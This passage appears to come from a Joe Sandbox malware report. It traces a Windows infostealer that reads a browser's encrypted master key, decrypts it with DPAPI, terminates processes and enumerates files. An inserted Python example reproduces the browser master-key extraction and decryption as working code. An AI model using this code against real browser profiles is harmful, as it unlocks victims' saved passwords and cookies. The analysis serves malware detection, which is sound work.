                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: f7e056669bcb0cb5559a17d0ce1e92ea7f77cd41f2cb4d5365d411ff662e5fab
                              • Instruction ID: 1e89db324f66873621a21adf05fff392edfb8d6a9a1adb49bdfcb7a3bf109d5d
                              • Opcode Fuzzy Hash: f7e056669bcb0cb5559a17d0ce1e92ea7f77cd41f2cb4d5365d411ff662e5fab
                              • Instruction Fuzzy Hash: 4B51D272D10108AADB04FFA4DE96DED7379EF64300F508529F916B7191EE346A09CFA2
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 5186170e3041df3e46f3dee4cf3087ad2c392b1e28b8c00eb1f6963d3935f189
                              • Instruction ID: 8e7feb0f8ed26299926adb0e3dd19426d7eb3fabc9b8a62626f28b701080a228
                              • Opcode Fuzzy Hash: 5186170e3041df3e46f3dee4cf3087ad2c392b1e28b8c00eb1f6963d3935f189
                              • Instruction Fuzzy Hash: 02413CB6D10109EBCF04EFA4DD55AEEB774AF64304F008418E516B7290EB75AA06CFA6
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A59D39
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
                                • Part of subcall function 00A59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
                                • Part of subcall function 00A59AC0: LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F
                                • Part of subcall function 00A59B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A59B84
                                • Part of subcall function 00A59B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A59BA3
                                • Part of subcall function 00A59B60: LocalFree.KERNEL32(?), ref: 00A59BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: f7a93cc8a59001a4bf298502b5ae15cbc3e4e4b8b8c9542db0c476652ed29b9d
                              • Instruction ID: 50515bff9276d4fb6f607ac830845c7e726a81e748025d8215785b9190a96ff2
                              • Opcode Fuzzy Hash: f7a93cc8a59001a4bf298502b5ae15cbc3e4e4b8b8c9542db0c476652ed29b9d
                              • Instruction Fuzzy Hash: FB3132B6D10209EBCF14DFE4DD85AEF77B8BF48305F144519E905A7241E7359A08CBA1
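The function above is the Chromium master-key recovery step: the string references `"encrypted_key":"` and `DPAPI`, the API set (CreateFile/ReadFile/GetFileSize, CryptStringToBinary, LocalAlloc/LocalFree) and the `CryptUnprotectData(?,0,0,0,0,0,?)` subcall at 00A59B60 together describe reading a browser's `Local State` file, pulling the base64 value of `encrypted_key`, stripping the 5-byte `DPAPI` tag and unprotecting the remaining blob with the calling user's DPAPI key (no description, no entropy, no prompt, flags 0). The Python below is an added example written for this page, not code recovered from the sample or produced by Joe Sandbox. It mirrors that call sequence so an analyst can reproduce or detect it: the `Local State` document and the "ciphertext" inside it are constructed stand-ins, the `ctypes` wrapper around `CryptUnprotectData` is the editor's reproduction (Windows only, guarded), and the injectable `unprotect` parameter is a design choice so the parsing stage can be exercised offline or fed to an offline DPAPI master-key decryptor.

```python
import base64
import ctypes
import json
import sys
from typing import Callable, Optional

# Added example (not code from the analysed sample or from Joe Sandbox):
# reproduces the "Local State" master-key recovery that the trace evidences:
# find "encrypted_key":"...", base64-decode (CryptStringToBinaryA in the trace),
# strip the 5-byte "DPAPI" tag and hand the remainder to CryptUnprotectData.
# All sample data below is constructed.

DPAPI_TAG = b"DPAPI"
# Fixed header of every CryptProtectData blob: dwVersion=1 followed by the
# DPAPI provider GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}, little-endian.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed stand-in for a real Local State: the "ciphertext" is the blob
# header plus a recognisable payload, so the parsing stage is checkable offline.
FAKE_PAYLOAD = b"\xaa" * 32  # stands in for the 32-byte AES-256 master key
FAKE_BLOB = DPAPI_BLOB_MAGIC + FAKE_PAYLOAD
SAMPLE_LOCAL_STATE = json.dumps(
    {"os_crypt": {"encrypted_key": base64.b64encode(DPAPI_TAG + FAKE_BLOB).decode()}},
    separators=(",", ":"),  # Chromium writes compact JSON, hence the exact marker string
)


def extract_encrypted_key(local_state_text: str) -> bytes:
    """Locate "encrypted_key":"<b64>", decode it and strip the DPAPI tag.

    A plain substring search is used on purpose: it is what the string
    reference in the trace implies, and it works on Chromium's compact JSON.
    """
    marker = '"encrypted_key":"'
    start = local_state_text.find(marker)
    if start < 0:
        raise ValueError("no encrypted_key in Local State")
    start += len(marker)
    end = local_state_text.find('"', start)
    if end < 0:
        raise ValueError("unterminated encrypted_key value")
    raw = base64.b64decode(local_state_text[start:end])
    if not raw.startswith(DPAPI_TAG):
        raise ValueError("encrypted_key is not DPAPI-wrapped")
    return raw[len(DPAPI_TAG):]


def looks_like_dpapi_blob(blob: bytes) -> bool:
    """Cheap structural check before calling into crypt32."""
    return blob.startswith(DPAPI_BLOB_MAGIC)


class _DATA_BLOB(ctypes.Structure):
    _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.c_void_p)]


def dpapi_unprotect(blob: bytes) -> bytes:
    """CryptUnprotectData with the argument pattern seen in the trace:
    no description, no entropy, no prompt, flags 0. Windows only."""
    if sys.platform != "win32":
        raise OSError("CryptUnprotectData is only available on Windows")
    crypt32 = ctypes.windll.crypt32
    kernel32 = ctypes.windll.kernel32
    kernel32.LocalFree.argtypes = [ctypes.c_void_p]  # avoid pointer truncation on x64
    buf = ctypes.create_string_buffer(blob, len(blob))
    inp = _DATA_BLOB(len(blob), ctypes.addressof(buf))
    out = _DATA_BLOB()
    ok = crypt32.CryptUnprotectData(ctypes.byref(inp), None, None, None, None, 0, ctypes.byref(out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        kernel32.LocalFree(out.pbData)  # crypt32 allocates pbData with LocalAlloc


def recover_master_key(local_state_text: str,
                       unprotect: Optional[Callable[[bytes], bytes]] = None) -> bytes:
    """Full pipeline. `unprotect` is injectable so the parsing stage can be
    exercised offline, or an offline DPAPI decryptor substituted for crypt32."""
    blob = extract_encrypted_key(local_state_text)
    if not looks_like_dpapi_blob(blob):
        raise ValueError("stripped value does not start with a DPAPI blob header")
    return (unprotect or dpapi_unprotect)(blob)


if __name__ == "__main__":
    blob = extract_encrypted_key(SAMPLE_LOCAL_STATE)
    print("DPAPI blob:", blob.hex(), "valid header:", looks_like_dpapi_blob(blob))
```

Two points for practitioners: the 20-byte header check is a reasonable hunt signature for DPAPI blobs being read out of browser profile files by anything other than the browser, and on recent Chrome builds the DPAPI-wrapped `encrypted_key` alone is no longer sufficient for cookies, which are additionally protected by the separate app-bound key; this example deliberately covers only the DPAPI layer the trace shows.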
                              APIs
                              • memset.MSVCRT ref: 00A694EB
                                • Part of subcall function 00A68D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A6951E,00000000), ref: 00A68D5B
                                • Part of subcall function 00A68D50: RtlAllocateHeap.NTDLL(00000000), ref: 00A68D62
                                • Part of subcall function 00A68D50: wsprintfW.USER32 ref: 00A68D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00A695AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A695C9
                              • CloseHandle.KERNEL32(00000000), ref: 00A695D6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 34482029817a6cc9ab8c5749d90091ba724abe54bfca4ae20f71858a4843a2bb
                              • Instruction ID: c9a45f9e0d0b2387cca5f60d8b27bcdf5d72e506b1ffd2c5bfe37644752451d7
                              • Opcode Fuzzy Hash: 34482029817a6cc9ab8c5749d90091ba724abe54bfca4ae20f71858a4843a2bb
                              • Instruction Fuzzy Hash: 24310C71E00218DFDB14DFD0CD49BEEB778EB54700F104559E506AB184DB74AA89CF96
                              APIs
                              • CreateFileA.KERNEL32(00A63AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00A63AEE,?), ref: 00A692FC
                              • GetFileSizeEx.KERNEL32(000000FF,00A63AEE), ref: 00A69319
                              • CloseHandle.KERNEL32(000000FF), ref: 00A69327
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 7b527969dadf4cd946bc96584a1f9b08cb3b8c293ef33d50424475fbdb307a78
                              • Instruction ID: 872aa52141a480c64b3787ece3b5cfe222aa6cf14d349b2f0c02062700db8fd2
                              • Opcode Fuzzy Hash: 7b527969dadf4cd946bc96584a1f9b08cb3b8c293ef33d50424475fbdb307a78
                              • Instruction Fuzzy Hash: EDF0FF75E44208BBDB10DFF5DC49F9E77B9AB48710F10C658BA51AB2C0DA7496018B81
                              APIs
                              • __getptd.LIBCMT ref: 00A6C74E
                                • Part of subcall function 00A6BF9F: __amsg_exit.LIBCMT ref: 00A6BFAF
                              • __getptd.LIBCMT ref: 00A6C765
                              • __amsg_exit.LIBCMT ref: 00A6C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00A6C797
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4a50b667dbe94db66810956208c8f0d4791045e9aa742d6c7c3e1c73cfe7f306
                              • Instruction ID: 42e567919e7a678b4ebbb903380b954b0f574e7a78f0344de73598d700940fd8
                              • Opcode Fuzzy Hash: 4a50b667dbe94db66810956208c8f0d4791045e9aa742d6c7c3e1c73cfe7f306
                              • Instruction Fuzzy Hash: F1F0B432911310DFD721BBB89D0776E33B0AF00B30F208149F555E61D2DF6499819F6A
                              APIs
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64F7A
                              • lstrcat.KERNEL32(?,00A71070), ref: 00A64F97
                              • lstrcat.KERNEL32(?,01448A58), ref: 00A64FAB
                              • lstrcat.KERNEL32(?,00A71074), ref: 00A64FBD
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A6492C
                                • Part of subcall function 00A64910: FindFirstFileA.KERNEL32(?,?), ref: 00A64943
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FDC), ref: 00A64971
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FE0), ref: 00A64987
                                • Part of subcall function 00A64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A64B7D
                                • Part of subcall function 00A64910: FindClose.KERNEL32(000000FF), ref: 00A64B92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 1dbdfcf32cffc6597e7b67193074a17b7ca47a58529727b5f5e8580fc7fdc117
                              • Instruction ID: 01affd21f7b85aedf22b741271087f4f2a1b861506d13807156773d303feab94
                              • Opcode Fuzzy Hash: 1dbdfcf32cffc6597e7b67193074a17b7ca47a58529727b5f5e8580fc7fdc117
                              • Instruction Fuzzy Hash: 51215677900208A7CB54FBB0DD4AFEE337CBB58700F008555B65997181EE749AC98BE2